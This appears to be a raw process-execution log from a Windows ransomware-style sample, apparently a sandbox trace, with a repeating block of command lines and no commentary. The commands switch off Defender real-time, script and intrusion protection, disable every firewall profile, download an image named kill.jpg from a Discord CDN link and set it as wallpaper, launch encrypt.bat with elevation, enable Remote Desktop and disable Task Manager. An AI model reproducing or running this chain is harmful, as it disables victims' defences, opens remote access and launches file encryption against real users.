powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1241192614980620318/pexels-mitja-juraja-357365-970517.jpg?ex=66494e33&is=6647fcb3&hm=5d230b14503c4586a605bc32b42ec6f5a894c21fd27c2a8ab2538482ee660c7e&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1241192614980620318/pexels-mitja-juraja-357365-970517.jpg?ex=66494e33&is=6647fcb3&hm=5d230b14503c4586a605bc32b42ec6f5a894c21fd27c2a8ab2538482ee660c7e&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1241192614980620318/pexels-mitja-juraja-357365-970517.jpg?ex=66494e33&is=6647fcb3&hm=5d230b14503c4586a605bc32b42ec6f5a894c21fd27c2a8ab2538482ee660c7e&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1241192614980620318/pexels-mitja-juraja-357365-970517.jpg?ex=66494e33&is=6647fcb3&hm=5d230b14503c4586a605bc32b42ec6f5a894c21fd27c2a8ab2538482ee660c7e&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1241192614980620318/pexels-mitja-juraja-357365-970517.jpg?ex=66494e33&is=6647fcb3&hm=5d230b14503c4586a605bc32b42ec6f5a894c21fd27c2a8ab2538482ee660c7e&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1241192614980620318/pexels-mitja-juraja-357365-970517.jpg?ex=66494e33&is=6647fcb3&hm=5d230b14503c4586a605bc32b42ec6f5a894c21fd27c2a8ab2538482ee660c7e&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1241192614980620318/pexels-mitja-juraja-357365-970517.jpg?ex=66494e33&is=6647fcb3&hm=5d230b14503c4586a605bc32b42ec6f5a894c21fd27c2a8ab2538482ee660c7e&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1241192614980620318/pexels-mitja-juraja-357365-970517.jpg?ex=66494e33&is=6647fcb3&hm=5d230b14503c4586a605bc32b42ec6f5a894c21fd27c2a8ab2538482ee660c7e&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1241192614980620318/pexels-mitja-juraja-357365-970517.jpg?ex=66494e33&is=6647fcb3&hm=5d230b14503c4586a605bc32b42ec6f5a894c21fd27c2a8ab2538482ee660c7e&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

